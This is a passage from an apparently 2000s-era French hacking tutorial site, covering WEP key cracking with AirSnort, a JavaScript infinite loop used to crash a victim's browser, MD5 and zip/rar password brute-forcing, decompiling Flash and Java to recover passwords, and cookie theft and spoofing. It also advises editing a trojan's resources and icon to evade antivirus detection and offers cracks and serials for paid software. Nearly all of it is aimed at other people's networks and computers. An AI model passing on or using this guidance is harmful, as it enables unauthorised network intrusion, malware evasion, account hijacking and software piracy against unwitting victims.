cadre. Sélection : Ctrl-A Voir : génère un
aperçu en popup Source : Édite la page source en
décompilation Efface : efface l'ensemble du
tableau
Le codage étant réalisé par une fonction
java script, les navigateurs classiques, IE, Mozilla, Netscape,
Firefox, etc le traiteront automatiquement.
|
|
45. Wifi :
pirater un réseau sans fil
Le wifi permet de conecter par ondes
des appareils, dans le cas du wifi un ordinateur et un modem. Le wifi a
une porté de 100 mètres environs, si tu arrives à te connecter sur un
modem via wifi tu as accès à internet via ce modem et en plus tu peux
infiltré l'ordinateur qui utilise ce modem. Voici le schéma que nous
étudions : Un client utilise un modem pour se conecter
au net, son ordinateur est connecté par wifi à son modem via clé ou carte
wifi. L'ordinateur d'un pirate est dans le rayon de portée du
wifi.
Le hacker doit tout d'abord mettre son
installation wifi en mode 'monitor' ce mode n'est pas encore possible sous
Microsoft Windows car les drivers ne le permettent physiquement pas. Seul
le système d'exploitation Linux permet de se mettre en mode monitor. Pour
ceux qui n'ont pas Linux installez un émulateur : cigwin par exemple. Le
mode monitor consiste à rendre un ordinateur capable d'écouter (de capter)
les ondes wifi sans rien émettre. En monitor on peut détecter puis se
conecter à un réseau wifi.
Mais évidement ce réseau wifi est
protégé par une clé wifi assez longue la clé WEP. On va voir ci dessous
comment la pirater.
Air snort marche sous linux ou windows
et permet de sniffer les réseaux et hacker les clés WEP, il est disponible
depuis peu sous windows. il a besoin d'un certains nombre de paquets (5 à
10 millions) pour la trouver par calculs mathématiques mais l'expérience a
prouvée qu'il peut trouver une clé WEP en 30 minutes, dans cette
expérience les paquets qu'il analysait n'étaient que du ping en flood.
Pour des paquets 'normaux' il lui faut trois à quatre heures si le client
est tout le temps connecté, s'il se déconnecte le travail n'est pas perdu.
Pour fonctionner Air snort doit connaitre l'ip du modem (du client) , pour
cela reportez vous au sujets de LsD ci dessus, notement au sujet 'ip
sniffer'. De nos jours de plus en plus de gens sont en IP fixes ! Avec des
progs comme YGTBSM il y a moyen de faire des choses méchantes avec un Air
snort. Téléchargements : • Air snort Linux (lien) • Air snort windows 219Ko
.rar • cigwin 267Ko
pour xp : lance
airsnort.exe qui est dans le répertoire bin, et s'il te faut des .dll
comme iconv.dll et intl.dll tu les trouveras sur dlldump, il
faut installer GTK-Runtime-Environment-2.2.4-3.exe si ce n'est pas déjà
fait. Enfin lance airsnort.exe en mode console ! sinon la fenêtre
s'ouvre et se referme.
46. Peer to peer crypté
Les données envoyées sont toujours
principalement en UDP donc bordélique mais ton FAI n'a aucun moyen
d'identifier ce que tu fais car les données sont cryptés à l'envois et
décryptées chez toi. Ci dessous une liste des premiers p2p cryptés
: Téléchargements : .
Freenet . Nodezilla
.
Mute . Ants . Kameleon
.
i2p Expérimentals,
certains sont encore à mettre au point ou sont juste lents, venez en
parler sur le forum
47. script pour planter navigateur et système d'exploitation
par saturation (overflow)
Bien que maintenant les navigateurs
webs détecte les scripts qui vont faire planter le processeur cela peut
être pratique pour déconnecter, planter, etc le pc de quelqu'un qui
utilise un ancien navigateur (win98 par exemple). Redirigez le vers une
page html contenant le script suivant :
<script
type="text/javascript"> while
(1) </script> |
48.
md5 (Message digest 5) et autres algorithmes de cryptage
Introduction : Le
fonctionnement de l'authentification sur un serveur dépend de son système
d'exploitation (essentiellement Windows et UNIX) et du logiciel serveur
web utilisé (Apache fonctionne sur toutes les plates-formes, et Microsoft
IIS sous Windows uniquement).
- Crypt : algorithme le plus utilisé,
basé sur le DES. Passe partout sous UNIX, mais pas pour Apache pour
Windows et TPF. Pour les mots de passe ainsi codés, seuls les 8 premiers
caractères comptent pour le cryptage.
- MD5 : algorithme à base de MD5
reconnu uniquement par les serveurs Apache, quelle que soit la
plate-forme utilisée.
- SHA : Utilisé essentiellement pour
faciliter la migration de ou vers les serveurs Netscape utilisant LDIF
(LDAP Directory Interchange Format).
md5 Le md5 est un algorithme
de cryptage (hachage cryptographique) il est très répandu bien qu'il ne
soit pas spécialement sur. Le md5 est la suite du md4, dans le même genre
mais en plus sécurisé il y a le sha-256, le ripemd ou encore whirpool.
Hacker un md5 se fait par brute force, un mot de passe de 5 caractère en
md5 prends 10 secondes à décryptés mais un mot de passe de plus de 8
caractère mettrait des années à être décrypté. Néanmoins les programmes de
bruteforce pour md5 font ça à partir de dictionnaire et sont donc assez
rapide. Via une grosse base de donnée et du php on peut même faire un
cryptage et un décryptage de md5 instantanée en ligne quasi instantané -
J'ai placé ci dessous un formulaire et les rares liens du net qui
proposent ce genre de service. Codé en 128bits le md5 se présente
toujours sous la forme de 35 caractères, il est très improbable qu'un même
md5 corresponde à deux mots différents. Le md5 est encore utilisé de nos
jours pour la sécurité des système Gnu et Linux, notement dans les
htaccess. Le rainbow cracking permet (en gros) d'exploiter le code md5
et de le cracker beaucoup plus rapidement, mais les codes md5 sont
protégés par un 'salt' un ajout de code et cette méthode ne marche plus.
Note aussi que le terme 'cracker' pour un md5 n'est pas correcte, le md5
ne se crack pas il se décrypte. Exemple : f5136948bad11041edafc422e87cc484 correspond au mot
'dagost' Exemple : 09c3baf843a653211569e3b00f1328cf correspond au mot 'dAgost' Les mots de passes unix de 13
caractères sont en crypt (htpasswd par exemple)
téléchargements pour windows
Utilisateurs de Linux, vous pouvez compiler
John avec make. • John
the ripper (-386) brute force pour md5 et crypt - mode
console 1.3Mo .zip (existe pour unix & dos) • rainbow crack 1.2 brute force sur les
rainbow - mode console 548Ko .zip • MDcrack-NG brute force md5, base64, QuotedP
et ascii/hexa 4.43Mo .exe • liste d'exemples .txt
Crackage de hash divers en ligne
:
si la base de donnée ci-dessus est
insuffisante essaie une de celles ci : • convertir
et décrypter du md5 en ligne [lien] • convertir un mot en crypt, md5 ou
SHA-1 avec ce formulaire javacript en ligne : [lien] • convertir et décrypter du md5 en
ligne par rainbow table [lien] imettez cette page en favoris : http://dagost.free.fr/hack_md5.htm
pour ne pas tout recharger.
49.
Navigateurs web alternatifs
Bien que la majorité des utilisateurs
utilisent Internet Explorer, Mozilla ou encore le navigateur fournit par
leur fournisseur (comme Wanadoo) il existe d'autres navigateurs. Un pirate
n'étant pas un utilisateur 'normal' il a besoin de matériel efficace,
deplus ces navigateurs alternatifs sont au niveau sécurité plus évolué que
les navigateurs standards, Internet explorer est en effet particulièrement
vulnérable. Internet Explorer (IE) est vulnérable de quatres grandes
manières : 1. informations mal stockées (dernière page visité,
navigateur, système et version, nom de l'ordinateur, contenu du presse
papier peuvent être récupérer avec un simple script) 2. nombreuses
failles (noyau mais aussi java, flash, images, ... ) donc beaucoup de vers
et malwares qui nuisent à l'ordinateur 3. ActiveX peut prendre le
contrôle de l'ordinateur 4. un trojan pw.stealer peut récupérer login
et mdp utilisés pour IE. Ci dessous les navigateurs alternatifs les
plus connus, ils n'utilisent pas le moteur de Internet Explorer et sont
gratuits :
K-Meleon |
navigateur type opéra avec
header modifiable, multi-proxy ... |
[lien] |
Lynx |
navigateur texte
seulement |
[lien] |
Opéra |
beaucoup d'options de sécurité
(désactiver les scripts par exemple) ftp : toutes options,
news |
[lien] |
Firefox |
Mozilla avec plus d'options -
protocoles ftp (lecture seulement) , news |
[lien] |
Mozilla & Mozilla
Firefox |
Mozilla navigateur sécurisé
pour le grand public - pas de ftp et de news sans modules |
[lien] |
50. Décompiler java et flash
Mon site
n'est pas un site de cracking, bien qu'il contienne des liens, des moteurs
de recherches, etc. Je classe la décompilation du java et du flash dans le
hacking standard, java et flash étant deux langages de programmation
typique d'Internet (ne pas confondre java et javascript). Décompiler
permet d'avoir accès au(x) script(s) internes de l'applet java ou du
programme en flash - par exemple il est simple de trouver un mot de passe
d'un formulaire flash ou java après avoir décompiler. Après avoir
récupérer (source + getright) les fichiers à cracker (.class pour
les java et .swf pour les flash) il suffit de les ouvrir avec leur
décompilateur respectif, j'allongerai la liste un de ces jours et y
ajouterai les cracks :
En étudiant le code source qui est
plus ou moins logique selon ton niveau on arrive facilement à retrouver le
mot de passe (par exemple) d'un programme flash ou d'un applet java voir
ci dessous :
note : pour les applets java
c'est différent; le code n'est pas forcement dans la source mais il est en
général dans un fichier, lequel est indiqué dans le code.
51. Cracker une archive zip ou rar protégée par mot de
passe
Lors de la création d'une archive,
un mot de passe peut être installé et bien que les .zip soient plus
anciens que les .rar ces deux systèmes ne sont crackables que par la même
méthode : la brute force. Néanmoins vu que la brute force ne se fait pas
via le net elle est très rapide : 1.000.000 mdp testés / seconde en
moyenne pour un processeur de 1.5Ghz. Ainsi un mot de passe égal ou
inférieur à 6 caractères est crackable en une minute maximum, au dessus de
6 caractères le temps augmente vite, sauf si le mot de passe n'est composé
que de chiffres. Il faut bien configurer son programme de brute force en
fonction des caractères (charsets) du mot de passe à cracké : lettres
minuscules, lettres majuscules, les deux, que des chiffres, tous les
caractères existants, etc ... Les programmes que le site de dagost propose
ci-dessous permettent aussi de faire une attaque à partir d'un
dictionnaire, Ils ne sont pas gratuit mais je mets à ta disposition leur
crack ou serial respectif dans le répertoire /Lsd, lis bien les
instructions. pour les zip : • AZPR :
Advance Zip Password Recovery v.4.0 (le plus connus)
1.6Mo pour les rar : • RAR
Password cracker 343Ko Pour comprendre leur
fonctionnement, en attendant un tutorial vous pouvez consultez le site de
leur créateur ou le forum du site de dagost si vous rencontrez un
problème. Tu peux aussi télécharger winrar à partir de la page de
téléchargement du site de dagost, winrar est gratuit en shareware illimité
:]
52. Décompiler un exécutable, changer sa signature
virale
Modifier un exécutable peut
permettre que ce dernier ne soit plus détecter par un Antivirus. Un
exécutable est un programme compilé, c'est à dire qu'on ne voit plus sa
source et comme son nom l'indique il est fait pour être exécuter. On ne
peut pas récupérer la source d'un exécutable en le décompilant mais on
peut obtenir de l'assembleur : le language machine. On peut décompiler un
exécutable à deux niveaux., et seul le premier permet de modifier
facilement l'éxécutable.
Introduction :
|
Ci-contre la représentation des
différentes étapes d'un programme et en dessous leurs aspects
concrets. Encore en dessous le vocabulaire légendé des processus de
transformation.
1. compilation 2. décompilation
(impossible en pratique) 3. assemblage 4. désassemblage (par
abus de language décompilation) |
On distingue deux types d'éxécutable
: les Win32 et les Win16 , le nombre indique les bits utilisé, bien que
les récents windows peuvent exécuter un exécutable win16 grâce à wowexec
tous les nouveaux exécutables sont en 32bits (bientôt 64)
1er
niveau : les ressources Un exécutable est organisé en ressources
indiquant ses spécificités : mode utilisé, icône de l'exécutable,
commentaires, variables, ... Des programmes comme ResHacker permettent
de les éditer. On peut souvent rendre un trojan indétectable en modifiant
les variables de ses ressources, en remplaçant les commentaires et en
changeant l'icône.
|
J'ai utilisé ResHacker pour
éditer les ressources d'un utilitaires bien connus :
Hijackthis
Le bouton "Compile script" permet de
recompiler après avoir fait des modifications.
Ci-dessous : téléchargements d'outils
pour éditer des .exe au 1er niveau |
• ResHack
v3.4 (celle ci-dessus) 542Ko .zip • icône inserter v1.0 insert ou change une icône
sur un .exe 10Ko .zip
2eme niveau :
l'assembleur Le langage assembleur dit aussi assembleur ou
abrégé ASM, est le langage de
programmation lisible pour un humain le plus proche du langage machine
utilisé par le microprocesseur de
la machine. Contrairement à un langage de
'haut niveau', il y a une correspondance un à un entre le code
assembleur et le langage machine, ainsi il est possible de traduire le
code dans les deux sens sans perdre d'information. La transformation du
code assembleur en langage machine est accomplie par un programme nommé assembleur,
dans l'autre sens par un programme désassembleur. Les
opérations s'appellent respectivement assemblage et
désassemblage. Dans un programme réel en assembleur, c'est un peu
plus complexe que cela (on peut donner des noms aux routines, aux
variables), et on n'a plus cette correspondance. Sur les premiers
ordinateurs, la tâche d'assemblage était accomplie manuellement par le
programmeur : avec des trous. Ci-dessous toujours Hijackthis.exe mais
décompiler avec PE Explorer version 1.98 : remarquez les instructions
typiques de l'ASM push , mov, call.
|
Téléchargements : • PE Explorer
1.98 2.67Mo [lien] 30 jours d'essais - patch
v1.98 (
sinon 120$ )
Upx Upx est un programme
qui compacte efficacement les exécutables selon 3 techniques, il se peut
qu'après le passage de Upx ResHack ne puisse opérer , il te le dit. Dans
ce cas là il faut décompresser l'éxécutable avec un programme comme
ressource tuner (même boite que PE Explorer) qui gère upx avec le plugin
UPX-Unpacker Téléchargements : . Upx 247Ko
.rar -mode console . ressource tuner 1.98 2.02 Mo [lien] 30 jours d'essais
* le patch pour PE Explorer
est testé il marche au contraire de ceux pour PE Explorer qui plantent
:s décompiler, modifier puis recompiler un programme sous
copyright est illégal n'hésitez pas à proposer d'autres outils
sur le forum, par mail ou sur irc.
Pour plus d'infos voir 53. cracking
tools l
53. Cracking : outils nécessaires @ tools
i compilateurs . Delphi : décompilateur Delphi .rar
761Ko . Flash : décompilateur flash .rar
84Ko . vb : décompilateur visual basic .rar
579Ko . OllyDbg : désassembleur et analyseur par étapes
.rar 1.6Mo . w32dasm : windasm éditeur hexadécimal pour win32
.rar 513Ko . winhex : éditeur hexadécimal .rar
11Ko . RDG : analyse et révèle un compresseur éventuelle
.rar 233Ko
54. Exploits
55. cookies
Un cookie est un fichier texte qui
contient des données qui vous identifie auprès d'un siteweb, on ne va pas
revenir dessus. Un cookie contient des variables : son nom, son contenu,
le serveur qui l'utilise et dans quel répertoire, son utilisation (pour
des connections cryptées seulement ou pour toutes les connections) et sa
dâte d'expiration. Si vous ouvrez un cookie (ici un de google) avec un
éditeur de texte vous obtenez un texte semblable à ceci :
PREF□ID=19864ed93f467011:TM=1157102462:LM=1157102462:S=rIZfpPc2yCMH0zlv□goo gle.fr/□15362618878336□32111634□4000279664□29805991□* |
le □ signifie un retour à la ligne
et la fin d'une variable, comprenez donc plutôt :
PREF ID=19864ed93f467011:TM=1157102462:LM=1157102462:S=rIZfpPc2yCMH0zlv google.fr/ 1536 2618878336 32111634 4000279664 29805991 * |
le nom du cookie est PREF son
contenu est
ID=2badd29ac120c61a:TM=1157292239:LM=1157292239:S=EeCU8xk6ejV6leOK
Le contenu ne peut en théorie n'être compris que par le site. Le contenu
est souvent crypté. le serveur qui l'utilise est google.fr dans la
racine (google.fr/) ce cookie expire le dimanche 17 septembre 2006 à
16h03, cette information est aussi cryptée
Un cookie peut contenir dans son
contenu un mot de passe ou du moins peut contenir une clé qui indique que
le possesseur de ce cookie a tel ou tel pouvoir sur tel ou tel serveur,
session, page ... Il y a donc deux grands moyens de hacker via les cookies
: 1. voler et stocker les cookies d'un utilisateur, les examiner
pour trouver un mot de passe éventuel (session hijacking) 2.
modifier ses propres cookies pour avoir accès à quelque chose de protéger.
(cookie spoofing) Les scripts https et les serveurs sécurisés cryptent
leur cookie avec des clés de façon que seuls eux puissent les comprendre,
dans ce cas là l'examen d'un cookie est impossible et on en revient à
devoir voler un cookie. En effet Dans un espace privé accédé en http, les
cookies peuvent être échangés en https afin d'en assurer la
confidentialité du contenu. Les navigateurs sont en effet tenus de fournir
à l'application web via un canal protégé tout cookie déposé de façon
sécurisée. Les identifiants de session sont donc en sécurité.
Ce genre d'attaque risque de ne pas
marcher sur des navigateurs web assez sécurisé comme Mozilla qui gère et
cache lui même les cookies, sinon celà fonctionne sur tous les navigateurs
de la gamme windows.
Pour modifier un cookie il existe
des dizaines de méthodes et sûrement autant de prog pour le faire,
ci-dessous trois façons simple :
avec opéra :
avec Mozilla et le plugin AnEC
Cookie Editor :
Ou encore tout simplement avec IE
et le javascript :
syntaxe : Set-Cookie: NAME=VALUE;
expires=DATE; domain=DOMAIN_NAME;path=PATH; secure
dagost © 2004 - 2007 -
dagost.org |